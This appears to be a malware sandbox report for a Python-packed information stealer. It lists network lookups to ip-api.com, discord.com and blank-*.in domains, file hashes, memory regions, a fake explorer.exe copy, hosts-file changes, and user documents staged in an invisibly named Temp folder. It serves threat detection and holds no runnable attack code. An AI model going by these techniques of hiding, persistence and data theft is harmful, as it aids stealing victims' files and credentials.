US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 blank-kzda6.in udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 52.111.229.43:443 tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 blank-xuiuv.in udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 109.116.69.13.in-addr.arpa udp
N/A 224.0.0.251:5353 udp

Files

memory/1816-0-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\zyron.exe 

MD5 6b9890a680fb22f32d8318ca466145ad
SHA1 69380599cb62403138660cb08c59ece67dc3d388
SHA256 00a2dcab663ed13d838b665b3db093bcc44c610399148a9f643c044c1f90aca9
SHA512 565ce693948c92741c94793e82625bc92c42c407d496519205f475b12131d55e224b21571c0c173507a2a2a4382d2b4d2c0e4a3ad7cba374fa82d79001e5058c

C:\Users\Admin\AppData\Local\Temp\_MEI48802\python312.dll

MD5 2f1072ddd9a88629205e7434ed055b3e
SHA1 20da3188dabe3d5fa33b46bfe671e713e6fa3056
SHA256 d086257a6b36047f35202266c8eb8c1225163bd96b064d31b80f0dbe13da2acf
SHA512 d8dddc30733811ed9a9c4ae83ac8f3fc4d8ba3fa8051d95242fbd432fd5bf24122373ac5eea9fec78f0daf7c1133365f519a13cf3f105636da74820a00a25e9b

C:\Users\Admin\AppData\Local\Temp\_MEI48802\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

memory/1548-35-0x00007FFF98680000-0x00007FFF98D58000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI48802\_ctypes.pyd

MD5 1b06133298f03ff20e5d31cb3b0bca63
SHA1 0678e26f8d03e2ea0ba8d78d6d14809914d9c0a8
SHA256 e92c373cc790a5411681a78ade2b75ecb03f3cf17aab7d98c0fb3afa2254684d
SHA512 18c50a5ff69c0c7e19c27039eda0cade0e8bc8d617cca4bc8981dc8a519fa86a05a86b0662aaa493604e9801edf6a41ee65336332b715188e5e17a60a8154cbc

C:\Users\Admin\AppData\Local\Temp\_MEI48802\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

C:\Users\Admin\AppData\Local\Temp\_MEI48802\_ssl.pyd

MD5 7b0d6d717535bc48f0176fd6455a133b
SHA1 a3fd5e6495d961eeaa66ccb7b2a8135812210356
SHA256 3e2d13bda93c59fdd1b9bbb2b30c682774e8da4503248e96e0e3c1b0fe588ce7
SHA512 861443c982a821f61bd971f57f65998366f325d084f21636e38f91aaaac752e7dc2b2344f414db3cb7fddec08210cfc197c1815a44e9b726ff5eabe2c62f42f9

memory/1548-58-0x00007FFFB07F0000-0x00007FFFB07FF000-memory.dmp

memory/1548-57-0x00007FFFA83E0000-0x00007FFFA8405000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI48802\_sqlite3.pyd

MD5 a045491faa0cba94b3230b254db7f2d2
SHA1 11a87b7f872e24bab0b278bd88c514b5788975b1
SHA256 79769e9318b6e525a145293affedc97b5e7a2e994c88f9df445b887df75f92ee
SHA512 a279306e78f34feed13dedd7ecedd226304d5f06746a14c0f9759a7191953de6409b244d23629b25fe9c4a374528ffc6ac92bd1090e218ee5962815491fdcb43

C:\Users\Admin\AppData\Local\Temp\_MEI48802\_socket.pyd

MD5 cd2becb9c6dc5cc632509da8cbd0b15d
SHA1 28a705e779ed0e40651875cb62fa8e07d3e27e10
SHA256 2a56f2fdbd69a386924d2c00266f1a57954e09c9eb022280be713d0c6ef805ce
SHA512 fb22b719d4db4c50ab11984ba1bef29a2154d3f2a283b9fa407fd5ec079b67bedf188d5bb94b45b3d18e9000dce11ebf8bb3cd35d465ccbe49c54e150d21a62a

C:\Users\Admin\AppData\Local\Temp\_MEI48802\_queue.pyd

MD5 a56e79b7526129f06c4feacf1f8ed117
SHA1 99f4b0e65c01604f1f5beaff1c0549b1c5a807c5
SHA256 dff778a28f75ea484a8e2e91c31235eb8d44128f5ace83491e4fbe923addffad
SHA512 b1f1fee24e1041424e5e05e2087440a6b9eb79ab57367d6f83fa83c6a39c7eb693d6edac9a7ac1c22a26109014fb4a12ef31b33775b23e857afeca777ae0bbcb

C:\Users\Admin\AppData\Local\Temp\_MEI48802\_lzma.pyd

MD5 cf374ecc905c5694986c772d7fc15276
SHA1 a0ee612388a1c68013f5e954e9280ba0db1bd223
SHA256 d94c8b2004a570d0f3b1cfd0333e4b1a82696fe199a1614d9054f8bfef4ba044
SHA512 0074b3e365782721de8d0a6ee4aa43871d9498eae07a24443b84b755fa00ec3335e42aedeefed0499e642bde9f4ad08843f36b97e095ef212ec29db022676a42

C:\Users\Admin\AppData\Local\Temp\_MEI48802\_hashlib.pyd

MD5 ee8c405267c3baaa133e2e8d13b28893
SHA1 b048112268f8300b3e47e441c346dea35e55d52a
SHA256 462b55ca1a405cf11a20798cf38873a328d3720bbd9e46242ce40a5bc82f47d1
SHA512 da290e352fa759414bbfa84d1c213be9c5722f5b43ab36ae72ea816e792a04e9aaa5253b935d6acdc34611f0ef17c2c0e8d181d014ce3cb117b5775e406f820a

C:\Users\Admin\AppData\Local\Temp\_MEI48802\_decimal.pyd

MD5 a6102e46e07e1219f90392d1d89ac4d6
SHA1 425375d377fde63532aa567978c58a1f131a41b1
SHA256 572116a1ecdc809846f22d3ccd432326a7cff84969aa0de5a44e1fbe4c02bcf7
SHA512 27bad2fd9b9953798b21602f942228aae6cec23cac1c160a45c4a321f1d0151ce245a82cceb65bfcd7412b212cb19e44fff3b045d7f3bedac49ff92d1c4affa6

C:\Users\Admin\AppData\Local\Temp\_MEI48802\_bz2.pyd

MD5 2152fe099ca3e722a8b723ea26df66c6
SHA1 1daaaba933501949e5d0e3d3968f4279dcde617d
SHA256 41eb95b13a115594ca40eacbb73b27233b7a8f40e9dbfbc597b9f64f0a06b485
SHA512 5168f3c554ba8f6c1d923a047ca6784c106b56b8e1944113059190e2a9c19bd8722f14106ea7300ab222696e5164ee66d857b5d619328dd29bbb27943b073cf9

C:\Users\Admin\AppData\Local\Temp\_MEI48802\unicodedata.pyd

MD5 20f206b5b405d837c201b8fb443cfa5a
SHA1 f06b062505f7218d49a1ef0ea65c6212dc4105b0
SHA256 0ae76f7316506bcaa4a59f31817569129fd1baaaba89032953785dbf9f7a7242
SHA512 b36e4af96bef6b8c13d509b66c34f1cdf6ac8830267fabc13a811d7d486d938d798b32b4d195fea762ee550501002674d6681f8985318990b454a5bc5c982088

C:\Users\Admin\AppData\Local\Temp\_MEI48802\sqlite3.dll

MD5 5655f540da3e3bd91402e5e5b09a6d2f
SHA1 d44db47026b330d06fa84128fd9f0241f5752011
SHA256 aa05807dfa35d6fbe1484728110430802a791f3f8723f824696f2d6bd9c5b69a
SHA512 1205dcd5657dcc457f8d02452c47fcb2e7fee108a675aaddc9f7b82d1f2371e38080a6fa0f767524f835c544f129b6f71b2d716180d196b18a9a6dbef6c9bf03

C:\Users\Admin\AppData\Local\Temp\_MEI48802\select.pyd

MD5 79bb09417365e9b66c8fb984cbb99950
SHA1 517522dbcbefb65e37e309cb06fed86c5f946d79
SHA256 94f2bac05e32cb3791f66efb3229c932ab71bc3725a417340304219721b0d50d
SHA512 1c2129dd4d8febe2886e122868956ba6032a03b1297da095d3e9c02ab33183d964a8f790086e688b0720ab39aa1e8d0fe91fadbbe99035baf4d7cc5754de9e64

C:\Users\Admin\AppData\Local\Temp\_MEI48802\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI48802\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI48802\libssl-3.dll

MD5 6eda5a055b164e5e798429dcd94f5b88
SHA1 2c5494379d1efe6b0a101801e09f10a7cb82dbe9
SHA256 377da6175c8a3815d164561350ae1df22e024bc84c55ae5d2583b51dfd0a19a8
SHA512 74283b4051751f9e4fd0f4b92ca4b953226c155fe4730d737d7ce41a563d6f212da770e96506d1713d8327d6fef94bae4528336ebcfb07e779de0e0f0cb31f2e

C:\Users\Admin\AppData\Local\Temp\_MEI48802\libcrypto-3.dll

MD5 27515b5bb912701abb4dfad186b1da1f
SHA1 3fcc7e9c909b8d46a2566fb3b1405a1c1e54d411
SHA256 fe80bd2568f8628032921fe7107bd611257ff64c679c6386ef24ba25271b348a
SHA512 087dfdede2a2e6edb3131f4fde2c4df25161bee9578247ce5ec2bce03e17834898eb8d18d1c694e4a8c5554ad41392d957e750239d3684a51a19993d3f32613c

C:\Users\Admin\AppData\Local\Temp\_MEI48802\blank.aes

MD5 7ce138b2c0b8689475c61d3fa5ece79a
SHA1 70d12f62b136392be850260059a2db6a97e3da58
SHA256 8a4badcec2c7ec8379068eac2711228992745be2effc8b6fa212a1e8d315bfcc
SHA512 6f7a66cfcb860f92b74c4bbc50285a20d6cf14399eae345ca8ccf1fae4377d4f618e6634ba337e1e4e7de21c6b34af589ce8b16293ef85780797c70357122cfb

C:\Users\Admin\AppData\Local\Temp\_MEI48802\base_library.zip

MD5 ccee0ea5ba04aa4fcb1d5a19e976b54f
SHA1 f7a31b2223f1579da1418f8bfe679ad5cb8a58f5
SHA256 eeb7f0b3e56b03454868411d5f62f23c1832c27270cee551b9ca7d9d10106b29
SHA512 4f29ac5df211fef941bd953c2d34cb0c769fb78475494746cb584790d9497c02be35322b0c8f5c14fe88d4dd722733eda12496db7a1200224a014043f7d59166

memory/1548-64-0x00007FFFA4540000-0x00007FFFA456D000-memory.dmp

memory/1548-67-0x00007FFFAB820000-0x00007FFFAB839000-memory.dmp

memory/1548-68-0x00007FFFA4510000-0x00007FFFA4534000-memory.dmp

memory/1548-70-0x00007FFF98150000-0x00007FFF982C6000-memory.dmp

memory/1548-74-0x00007FFFA82B0000-0x00007FFFA82BD000-memory.dmp

memory/1548-73-0x00007FFFA7A50000-0x00007FFFA7A69000-memory.dmp

memory/1548-76-0x00007FFFA44D0000-0x00007FFFA4503000-memory.dmp

memory/1548-80-0x00007FFF98080000-0x00007FFF9814D000-memory.dmp

memory/1548-81-0x00007FFF97B50000-0x00007FFF98072000-memory.dmp

memory/1548-82-0x000001D38BB20000-0x000001D38C042000-memory.dmp

memory/1548-84-0x00007FFFA5DE0000-0x00007FFFA5DF4000-memory.dmp

memory/1548-86-0x00007FFFA8190000-0x00007FFFA819D000-memory.dmp

memory/1548-88-0x00007FFF98680000-0x00007FFF98D58000-memory.dmp

memory/1548-89-0x00007FFF97A30000-0x00007FFF97B4B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j1vxgdyt.jdr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3232-96-0x000001287F8A0000-0x000001287F8C2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

memory/1548-191-0x00007FFFA83E0000-0x00007FFFA8405000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1 e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256 a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512 c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

\??\c:\Users\Admin\AppData\Local\Temp\cj3lxvzi\cj3lxvzi.cmdline

MD5 a1b2375f1e0a525201b6d2d601f7d928
SHA1 345ff5eadb0149d47f01d9d9a0b00bb80f0b239e
SHA256 aefaf547ad0efc8d88c13f718516d8d4f88bf4bbb81365d7b92ce0f792126658
SHA512 15ba49c80c3e6528026c8e2b0d1649cae13a4bf7d956dc12bbc5524d5dfa41b5ec63a259bcbeead4dcf4700c0a4dba46644f33751b17c986c1008d17753c3955

\??\c:\Users\Admin\AppData\Local\Temp\cj3lxvzi\cj3lxvzi.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

\??\c:\Users\Admin\AppData\Local\Temp\cj3lxvzi\CSCD8E5FF1D5B2B4571A40C33BB0E7D381.TMP

MD5 fdbc68b48da7c5ce738744fd9fd2c66e
SHA1 ba94849ad91cdc3b1db64b592402c3bb121556cb
SHA256 7e1966ae96052d0b31ecba018f87b309c7ebad77e16d983ffff51e04860e6273
SHA512 90d3e4c625cb78adb3e6fda210d03e82aa4aab8f73f28a0e4ce53273e7a0f414be32413b5f6c4cb2e01ea4c204fe8bc25b22bac3d27a3d99bce476c4539ee778

C:\Users\Admin\AppData\Local\Temp\RES8666.tmp

MD5 bfda36bb9b12b7a8a30f90e37f9e1cda
SHA1 0bfd602c1bce63f5d63bbf7e6cd00b1ce07691df
SHA256 07c7d9685ffae5640372d87fa263b86d6bc6ceebb78e9dae688984b77d5a3cf9
SHA512 0590a0cb1d4946f1e05bf3707c3a46a2149b86728b1ee907891fea813aa2c55094e0730bfabf4b289352dcccf27d7957da4802988bbb176db27c553c33a9a65b

C:\Users\Admin\AppData\Local\Temp\cj3lxvzi\cj3lxvzi.dll

MD5 28f10385588f24ab83ac563f95ba31c5
SHA1 e0c47216dfa55f34a2943cf561d3f226e94ff4ba
SHA256 85c2b6feb48fbdcc5c1954700031b48b3ae238d19421c37f1dc23810c75f2943
SHA512 281ecbdf0483c9328ca4e8c0740327d698051f2bb3cafcde5081262ffa6808351eac3626d39dd7a515075d8bc03ab9c7953dac5e9b05d87825631cb36a935386

memory/3816-211-0x000001435F1E0000-0x000001435F1E8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e2efbfd23e33d8d07d019bdd9ca20649
SHA1 68d3b285c423d311bdf8dc53354f5f4000caf386
SHA256 f4386e3a103dafd6e85bebc2ad649069d168b4da8a0ded51b3ec96fa1408a828
SHA512 b7a961002557ff2efb785f756c9347e250392eab3dcb5168c67e89238e85368a41d0a5bdc94bfbbc192ba427c83e982234b3cf8824b166a69973f3f9df177443

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9192804218d4c7beed236c755efeb927
SHA1 7cdd473f86179dcead44fe88b03e54a6026d1348
SHA256 5d285e5f9d806d18a08b2b550a9dfd01633835256999efdcdd74de04cdb89209
SHA512 edebd9e697ffce29d2057240f6bf20a443b521d8270bf1bcfdb2f8650b3b8e394bcb79c6af7440b04da858873c12ca12131011464cf3f436c805a7a0e11a92b2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 88be3bc8a7f90e3953298c0fdbec4d72
SHA1 f4969784ad421cc80ef45608727aacd0f6bf2e4b
SHA256 533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a
SHA512 4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

C:\Users\Admin\AppData\Local\Temp\‍​ ‏   ‍​ \Common Files\Desktop\CopyOpen.mp4

MD5 df9784a975a0030f3a2c94fe34edda01
SHA1 421d579c9758fc70d754ab5c6beca2453ca9dd8f
SHA256 de9e93ecfdabc55dd1b08717c0e28d87cb17faac720458335377723bf4b560fe
SHA512 07966319021cbbca80dce24b2e4fdd11696e360663a2134ec933f853d908a535c22d047174fa907cf96498648035f114bb5a47e8564b03782164f08d3c8fcc2d

C:\Users\Admin\AppData\Local\Temp\‍​ ‏   ‍​ \Common Files\Desktop\GrantCompress.mp3

MD5 ad52bea734e7f0e2f5fae339500260d8
SHA1 78db253d00a197d06abc07b4452fd36c66a8e2f9
SHA256 6c6278f748fe1a1fe1c23d7405fd24883753c6ccbf66dfffd41708a995cf79e1
SHA512 1e8b50885ff428d1c39e255a0b703181899cfdcd3b824668af270ebfe62efa414de8519f1123ef6afdc5b78c5a469b4ad4b11dc979fb6b6047b24201175a98d1

C:\Users\Admin\AppData\Local\Temp\‍​ ‏   ‍​ \Common Files\Desktop\RegisterUpdate.xls

MD5 644ef7870c885f12d184acbd6bc1c99e
SHA1 aacd10bcd700420aa2e5529655ca71665c64859d
SHA256 d6435d3bc681c24e863178b3c4d339a5194ecfc84caccf54ac42a74ee444e95a
SHA512 674f85e0ce8373f39f6c612bbe05ff6b7819d1fc4c979ae0fe898700b377162dd0a34c02ac38cc6b686bfe483acc8d7760a954145873ec8ea58eef8157a1e32c

C:\Users\Admin\AppData\Local\Temp\‍​ ‏   ‍​ \Common Files\Documents\DisconnectAssert.xls

MD5 9b666b8e29876fba0ff6e9362c69d99f
SHA1 2fa3bb9e1f1b2e7d3152566b7a2be2541add5098
SHA256 fd0aabd571e9189fd2dfd35ab8f46cb1b1651489f7f9fd7bbaf1981ef7b6419e
SHA512 82b0b7a1ed0fe9c90e0b7a829c9d15dc91815b5ac2f55bf3458fc053fa4b309330046ed070580333c5953127f26f8a9f58de2f69cd8f015e63f1fa3fe64e4720

C:\Users\Admin\AppData\Local\Temp\‍​ ‏   ‍​ \Common Files\Documents\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

C:\Users\Admin\AppData\Local\Temp\‍​ ‏   ‍​ \Common Files\Documents\Files.docx

MD5 4a8fbd593a733fc669169d614021185b
SHA1 166e66575715d4c52bcb471c09bdbc5a9bb2f615
SHA256 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42
SHA512 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b

C:\Users\Admin\AppData\Local\Temp\‍​ ‏   ‍​ \Common Files\Documents\GetWrite.docx

MD5 75da4b4b166a30c18bfeff27aad79533
SHA1 6dc184581ba99a605e01cc5b59e7972586a586b6
SHA256 248377157913a82a4a20ba92dac2dcab367c45ac31e90012a6315209517622a6
SHA512 648bf6a7b0eb3bae8ac3ed8c251b228686bc0097201d8b50b491f0b91a44ed6766354c8ad2f37f2d7c40c555a25eec4a426691a25fc419db0022c51a5b6add07

C:\Users\Admin\AppData\Local\Temp\‍​ ‏   ‍​ \Common Files\Documents\InvokeImport.txt

MD5 fc6c5309eb2b858fb5a8fb7828f6aadb
SHA1 c953ef9b4d276d826d5868a60ccdf127bc85d5a8
SHA256 2e13924534c0fe2b08bbb6f2b593363b7830c65a736a61e224e2b170616ed4df
SHA512 e7368be4020ff60e7e9074d72fdaa5b81902bb91f97e655ef58748e98c14e848bdceadbf6bbd7b082e9e848c1e8afcadff05fe711cc0f4946d5aface6e133de2

C:\Users\Admin\AppData\Local\Temp\‍​ ‏   ‍​ \Common Files\Documents\Opened.docx

MD5 bfbc1a403197ac8cfc95638c2da2cf0e
SHA1 634658f4dd9747e87fa540f5ba47e218acfc8af2
SHA256 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6
SHA512 b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1

memory/1548-292-0x00007FFF98680000-0x00007FFF98D58000-memory.dmp

memory/3448-311-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1548-310-0x00007FFFA4510000-0x00007FFFA4534000-memory.dmp

memory/1548-303-0x00007FFF97B50000-0x00007FFF98072000-memory.dmp

memory/1548-302-0x00007FFF98080000-0x00007FFF9814D000-memory.dmp

memory/1548-301-0x00007FFFA44D0000-0x00007FFFA4503000-memory.dmp

memory/1548-300-0x00007FFFA82B0000-0x00007FFFA82BD000-memory.dmp

memory/1548-298-0x00007FFF98150000-0x00007FFF982C6000-memory.dmp

memory/1548-293-0x00007FFFA83E0000-0x00007FFFA8405000-memory.dmp

C:\Windows\Resources\Themes\explorer.exe

MD5 4fd2e8e9f2576df6d1be8b79f5252131
SHA1 fdb58749c2d24c163af7c3954f44352b8960fcad
SHA256 36b8a4bc10a95fa487f8b10f27c5c7f17b200d13e8a6ce66746097c618419358
SHA512 f395aa8bb1fa4806dd584a919453c0ca842657f83b6e23df42c329cfd41d20fb6b5440f0d11049904ae9dd7bb4a3c37061e787b410e3c09ddc1b55f5f603ad28

memory/2968-315-0x0000000000400000-0x000000000041F000-memory.dmp

memory/4628-325-0x0000000000400000-0x000000000041F000-memory.dmp

memory/688-337-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1548-336-0x000001D38BB20000-0x000001D38C042000-memory.dmp

memory/4628-338-0x0000000000400000-0x000000000041F000-memory.dmp

memory/3448-339-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1816-340-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1548-375-0x00007FFF97A30000-0x00007FFF97B4B000-memory.dmp

memory/1548-376-0x00007FFFA5DE0000-0x00007FFFA5DF4000-memory.dmp

memory/1548-383-0x00007FFF98150000-0x00007FFF982C6000-memory.dmp

memory/1548-382-0x00007FFFA4510000-0x00007FFFA4534000-memory.dmp

memory/1548-381-0x00007FFFAB820000-0x00007FFFAB839000-memory.dmp

memory/1548-380-0x00007FFFA4540000-0x00007FFFA456D000-memory.dmp

memory/1548-379-0x00007FFFB07F0000-0x00007FFFB07FF000-memory.dmp

memory/1548-378-0x00007FFFA83E0000-0x00007FFFA8405000-memory.dmp

memory/1548-377-0x00007FFF98680000-0x00007FFF98D58000-memory.dmp

memory/1548-372-0x00007FFF97B50000-0x00007FFF98072000-memory.dmp

memory/1548-371-0x00007FFF98080000-0x00007FFF9814D000-memory.dmp

memory/1548-370-0x00007FFFA44D0000-0x00007FFFA4503000-memory.dmp

memory/1548-369-0x00007FFFA82B0000-0x00007FFFA82BD000-memory.dmp

memory/1548-374-0x00007FFFA8190000-0x00007FFFA819D000-memory.dmp

memory/1548-368-0x00007FFFA7A50000-0x00007FFFA7A69000-memory.dmp

memory/1548-384-0x000001D38BB20000-0x000001D38C042000-memory.dmp

memory/3516-412-0x00007FFF969B0000-0x00007FFF97088000-memory.dmp

memory/3516-414-0x00007FFFA89E0000-0x00007FFFA89EF000-memory.dmp

memory/3516-413-0x00007FFFA8610000-0x00007FFFA8635000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI50802\blank.aes

MD5 381ecca5e096640bfd9c4f273afee3f2
SHA1 9a7c337888373c271f1c1259dcf8a0dd28bcc094
SHA256 fb80233aa4b06342a0fe13adcf4227a2034d59832cec60cc6b1f46d290cf1d35
SHA512 47c068a341471c763f9552ae670d3ab3764a1cc917b7bdb6fd3b52775f64671cf9392aa84cde927dcf85d24a292a53d654c36ce9b75bc3e0d7377915663de3a2

memory/3516-419-0x00007FFF98570000-0x00007FFF9859D000-memory.dmp

memory/3516-421-0x00007FFF98540000-0x00007FFF98564000-memory.dmp

memory/3516-422-0x00007FFF96830000-0x00007FFF969A6000-memory.dmp

memory/3516-420-0x00007FFFA5DE0000-0x00007FFFA5DF9000-memory.dmp

memory/3516-423-0x00007FFF98FE0000-0x00007FFF98FF9000-memory.dmp

memory/3516-424-0x00007FFFA8600000-0x00007FFFA860D000-memory.dmp

memory/3516-425-0x00007FFF981B0000-0x00007FFF981E3000-memory.dmp

memory/3516-427-0x00007FFF95A50000-0x00007FFF95F72000-memory.dmp

memory/3516-428-0x00000131DCDA0000-0x00000131DD2C2000-memory.dmp

memory/3516-426-0x00007FFF980E0000-0x00007FFF981AD000-memory.dmp

memory/3516-430-0x00007FFFA82B0000-0x00007FFFA82BD000-memory.dmp

memory/3516-429-0x00007FFF98940000-0x00007FFF98954000-memory.dmp

memory/3516-431-0x00007FFF96710000-0x00007FFF9682B000-memory.dmp

memory/5432-541-0x00000254C77D0000-0x00000254C77D8000-memory.dmp

memory/3516-552-0x00007FFF969B0000-0x00007FFF97088000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\yTxoWzLrRw.tmp

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

C:\Users\Admin\AppData\Local\Temp\BZuy8bjjGD.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\o6RxEXC0WX.tmp

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\glsAcjdyTA.tmp

MD5 9618e15b04a4ddb39ed6c496575f6f95
SHA1 1c28f8750e5555776b3c80b187c5d15a443a7412
SHA256 a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
